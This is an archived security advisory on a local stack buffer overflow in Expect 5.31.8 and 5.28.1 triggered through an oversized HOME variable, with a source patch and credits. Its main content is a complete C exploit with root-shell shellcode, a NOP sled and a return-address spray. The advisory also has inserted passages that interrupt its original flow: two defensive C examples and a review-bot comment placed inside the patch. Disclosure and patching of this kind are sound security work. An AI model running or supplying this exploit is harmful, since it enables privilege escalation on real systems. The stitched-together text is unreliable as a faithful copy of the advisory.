hhp-expect_adv0017.txt
Posted Dec 31, 2000
Authored by hhp, Isox | Site hhp-programming.net

Expect v5.31.8 and v5.28.1 contain a local buffer overflow. It is possible to exploit any suid/sgid expect application.

tags | exploit, overflow, local
SHA-256 | 8a69e04abc43d9ebdcd6198de5a7b5431ff007a5dca07c47115be8df48b6e33d

-------------------------------------------------------------------------------
hhp adv-17 Sec-Advisory/Exploit/Patch
www.hhp-programming.net
-------------------------------------------------------------------------------
Topic: Expect.
Versions: 5.31.8 and 5.28.1, maybe others.
Date: 12/12/2000
Platforms: Tested on Slackware Linux 7.x, maybe others.
Authors: Read credits.
-------------------------------------------------------------------------------
THIS ADVISORY IS BASED UPON SELF TESTING RESULTS. WE DO NOT GUARANTEE THE
INFORMATION STATED BELOW WILL BE CORRECT IN ALL SITUATIONS.


1) BACKGROUND

- Expect.
Expect is a program to control interactive applications. These applications
interactively prompt and expect a user to enter keystrokes in response. By
using Expect, you can write simple scripts to automate these interactions.


2) OVERVIEW

- It is possible to cause Expect to segfault due to improper bounds checking.
EIP can then be overwritten and the flow of execution changed. It is possible
to exploit any script that uses the Expect program (scripting language).


3) SETBACK

- If an Expect script is suid/sgid it most likely is not possible to gain the
set privileges, because Expect itself is executed before any permission
changes take effect.


4) REPRODUCTION

- If an application is suid/sgid and sets the effective UID or GID without
cleaning the environment, then calls upon Expect itself or via an Expect
script, it is possible to exploit the Expect scripting interpreter.
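One way a privileged caller can meet the "cleaning the environment" condition above, as an added example that is not part of the advisory or of Expect itself: rebuild the environment from an allowlist before running Expect, so the two variables Expect reads to locate .expect.rc (DOTDIR and HOME) never come from the caller. The allowlist, the 128-byte value cap and the trusted home path are assumptions made for the demonstration.

```c
#include <stdlib.h>
#include <string.h>

#define MAX_ENV_VALUE 128   /* far below the 200-byte buffer in exp_main_sub.c */
#define MAX_SAFE_ENV 16     /* output slots, including HOME and the NULL terminator */

/* Names a privileged caller may pass on; HOME and DOTDIR are deliberately absent. */
static const char *allowed[] = { "PATH", "TERM", "LANG", NULL };

/* Fills out[] (NULL-terminated) with the allowlisted, short entries of in[]
 * followed by HOME=<trusted_home>. Returns the entry count, or -1 on error. */
int build_safe_env(char *const in[], const char *trusted_home, char *out[])
{
    int n = 0, i, k;
    char *home;
    for (i = 0; in[i] != NULL; i++) {
        const char *eq = strchr(in[i], '=');
        size_t namelen;
        if (eq == NULL) continue;                     /* malformed entry, drop it */
        namelen = (size_t)(eq - in[i]);
        for (k = 0; allowed[k] != NULL; k++)
            if (strlen(allowed[k]) == namelen && strncmp(in[i], allowed[k], namelen) == 0)
                break;
        if (allowed[k] == NULL || strlen(eq + 1) > MAX_ENV_VALUE) continue;
        if (n >= MAX_SAFE_ENV - 2) return -1;         /* keep room for HOME and NULL */
        out[n++] = in[i];
    }
    home = malloc(strlen("HOME=") + strlen(trusted_home) + 1);
    if (home == NULL) return -1;
    strcpy(home, "HOME=");
    strcat(home, trusted_home);
    out[n++] = home;
    out[n] = NULL;                                    /* ready for execve(EXPECT, argv, out) */
    return n;
}

/* Constructed caller environment of the shape the exploit produces: a 416-byte
 * HOME plus a DOTDIR outside the user's home. Returns 1 if only PATH, TERM and
 * the trusted HOME survive, in that order. */
int demo_safe_env_ok(void)
{
    static char bighome[5 + 416 + 1];
    char *in[5], *out[MAX_SAFE_ENV];
    int n;
    memcpy(bighome, "HOME=", 5);
    memset(bighome + 5, 'A', 416);
    bighome[5 + 416] = '\0';
    in[0] = bighome; in[1] = "DOTDIR=/tmp/other"; in[2] = "PATH=/usr/bin:/bin";
    in[3] = "TERM=xterm"; in[4] = NULL;
    n = build_safe_env(in, "/home/alice", out);
    return n == 3 && strcmp(out[0], "PATH=/usr/bin:/bin") == 0 &&
           strcmp(out[1], "TERM=xterm") == 0 && strcmp(out[2], "HOME=/home/alice") == 0;
}
```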


5) EXPLOIT

--------------------- SNIP ----------------------------------------------------
/* hhp-expect_smash.c (12/11/00)
 *
 * expect (/usr/bin/expect) buffer overflow.
 * Tested 5.31.8 and 5.28.1, slackware 7.x (Maybe others).
 *
 * By: isox
 * Site: www.hhp-programming.net
 * Advisory: www.hhp-programming.net/ouradvisories/hhp-expect_adv%2317.txt
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>          /* strcmp, strlen */

#define NOP 0x90
#define OFFSET 0
#define BUFLEN 416           /* length of the HOME value handed to expect */
#define RET 0xbffff580UL     /* Slackware 7.1; 32-bit x86 stack layout assumed throughout */
#define EXPECT "/usr/bin/expect"

/* setuid(0), setgid(0), then execve("/bin/sh"); the trailing byte is
 * overwritten with a NUL at runtime */
char code[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x66\x31\xc0\x66\x31"
"\xdb\xb0\x2e\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
"\xdc\xff\xff\xff/bin/sh\x69";

void usage(char *arg) {
    fprintf(stderr, "\nUsage: %s [offset up/down] [eip]\n\n", arg);
    fprintf(stderr, "Examples:\n");
    fprintf(stderr, "\t%s 347 up -=- Default EIP increased by 347 bytes\n", arg);
    fprintf(stderr, "\t%s 347 down -=- Default EIP decreased by 347 bytes\n", arg);
    fprintf(stderr, "\t%s 429 up 0x%lx -=- EIP set to 0x%lx and increased by 429 bytes\n",
            arg, RET, RET + 429);
    fprintf(stderr, "\t%s 429 down 0x%lx -=- EIP set to 0x%lx and decreased by 429 bytes\n\n",
            arg, RET, RET - 429);
    exit(1);
}


int main(int argc, char *argv[]) {
    char *buf, *p;
    long *addressp;
    long address = RET;      /* was left uninitialised when neither "up" nor "down" matched */
    int offset = OFFSET;
    int i;

    if ((argc < 3) || (argc > 4))
        usage(argv[0]);

    /* two arguments: adjust the built-in return address */
    if (argc == 3) {
        if (!strcmp(argv[2], "up")) {
            address = RET + atoi(argv[1]);
            printf("Increasing offset by: %d\n", atoi(argv[1]));
            printf("Increasing EIP to: 0x%lx\n\n", address);
        }

        if (!strcmp(argv[2], "down")) {
            address = RET - atoi(argv[1]);
            printf("Decreasing offset by: %d\n", atoi(argv[1]));
            printf("Decreasing EIP to: 0x%lx\n\n", address);
        }
    }

    /* three arguments: start from a user-supplied return address */
    if (argc >= 4) {
        unsigned long base = strtoul(argv[3], NULL, 16);
        if (!strcmp(argv[2], "up")) {
            address = base + atoi(argv[1]);
            printf("Setting EIP to: 0x%lx\n", base);
            printf("Increasing offset by: %d\n", atoi(argv[1]));
            printf("Increasing EIP to: 0x%lx\n\n", address);
        }
        if (!strcmp(argv[2], "down")) {
            address = base - atoi(argv[1]);   /* original added here while printing "Decreasing" */
            printf("Setting EIP to: 0x%lx\n", base);
            printf("Decreasing offset by: %d\n", atoi(argv[1]));
            printf("Decreasing EIP to: 0x%lx\n\n", address);
        }
    }


    /* one byte more than BUFLEN: the original wrote the terminator at
     * buf[BUFLEN] inside a BUFLEN-byte allocation */
    if (!(buf = (char *)malloc(BUFLEN + 1))) {
        printf("Can't allocate memory.\n");
        exit(-1);
    }

    /* fill the whole buffer with the return address ... */
    p = buf;
    addressp = (long *) p;

    for (i = 0; i < BUFLEN; i += 4) {
        *(addressp++) = address;
    }

    /* ... then overwrite the front with a NOP sled followed by the shellcode,
     * leaving the last 4 bytes as the address that replaces the saved EIP */
    for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) {
        buf[i] = NOP;
    }

    p = buf + (BUFLEN - strlen(code) - 4);

    for (i = 0; i < strlen(code); i++)
        *(p++) = code[i];

    buf[BUFLEN] = '\0';


    /* expect formats $HOME into a 200-byte stack buffer with sprintf (see the
     * patch in section 6), so the oversized value overflows it */
    setenv("HOME", buf, 1);
    system(EXPECT);
    return 0;
}
--------------------- SNAP ----------------------------------------------------


6) SOLUTION

- Apply this patch, made and tested on version 5.31.8. To apply the patch,
take this snippet out and name it hhp-expect.patch in the expect-5.31
directory. Then type 'patch -p1 < hhp-expect.patch' and finish with a
'make' and a 'make install'.

--------------------- SNIP ----------------------------------------------------
--- old/exp_main_sub.c Sun Dec 17 04:01:50 2000
+++ new/exp_main_sub.c Sun Dec 17 04:02:46 2000
@@ -761,14 +761,14 @@
}
}
if (my_rc) {
- char file[200];
+ char file[256];
char *home;
int fd;
char *getenv();
if ((NULL != (home = getenv("DOTDIR"))) ||
(NULL != (home = getenv("HOME")))) {
- sprintf(file,"%s/.expect.rc",home);
+ snprintf(file, 256-1, "%s/.expect.rc", home); // Temporary fix.
if (-1 != (fd = open(file,0))) {
if (TCL_ERROR == (rc = Tcl_EvalFile(interp,file))) {
expErrorLog("error executing file: %s\r\n",file);
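Review bot: the `+ snprintf(file, 256-1, "%s/.expect.rc", home);` line stops the overflow but discards snprintf's return value, so an over-long $DOTDIR or $HOME now yields a silently truncated path that the following `open(file,0)` and `Tcl_EvalFile` still use; compare the result against sizeof(file) and skip the rc file (an expErrorLog call matches the surrounding error handling) when it does not fit. Two smaller points: write the size as `sizeof(file)` rather than `256-1` (snprintf's size argument already covers the terminator, so the `-1` only wastes a byte and the literal will drift if `char file[256]` changes again), and the `// Temporary fix.` comment is C99 syntax in a file that otherwise uses pre-ANSI declarations such as `char *getenv();`; use `/* */`.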

--------------------- SNAP ----------------------------------------------------
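As an added example of the check the patch above is reaching for (not the advisory's code and not Expect's source), a path builder that treats an rc path which does not fit the 200-byte buffer as an error instead of overflowing it or silently truncating it; the function names and the sample HOME values are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define RC_SUFFIX "/.expect.rc"

/* The original pattern, kept only for comparison and never called here: a
 * 200-byte stack buffer and an unbounded sprintf of $DOTDIR or $HOME. Any
 * value longer than 188 bytes runs past the end of file[]. */
void rc_path_unsafe(const char *home, char *file /* char file[200] */)
{
    sprintf(file, "%s" RC_SUFFIX, home);
}

/* Hardened form: 0 on success, -1 when the path does not fit in out[outlen].
 * snprintf returns the length it needed, so a value >= outlen means the path
 * was cut short and must not be opened; the buffer is cleared in that case. */
int rc_path_checked(const char *home, char *out, size_t outlen)
{
    int n;
    if (home == NULL || out == NULL || outlen == 0)
        return -1;
    n = snprintf(out, outlen, "%s" RC_SUFFIX, home);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed inputs: a normal HOME, and a 416-byte HOME of the size the
 * exploit in section 5 places in the environment. */
int demo_normal_home_ok(void)
{
    char file[200];
    return rc_path_checked("/home/user", file, sizeof file) == 0 &&
           strcmp(file, "/home/user/.expect.rc") == 0;
}

int demo_overlong_home_rejected(void)
{
    char file[200], home[417];
    memset(home, 'A', 416);
    home[416] = '\0';
    return rc_path_checked(home, file, sizeof file) == -1 && file[0] == '\0';
}

/* Longest HOME the 200-byte buffer accepts: 188 + strlen("/.expect.rc") + NUL == 200 */
int longest_home_that_fits(void)
{
    char file[200], home[256];
    int len, best = -1;
    for (len = 0; len < 255; len++) {
        memset(home, 'h', len);
        home[len] = '\0';
        if (rc_path_checked(home, file, sizeof file) == 0) best = len;
    }
    return best;
}
```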


7) CREDITS

- Ben Lull (isox) (plix@chainsawbeer.com) - Bug finding, exploit, testing.
- Cody Tubbs (loophole) (pigspigs@yahoo.com) - Advisory, patch, testing.
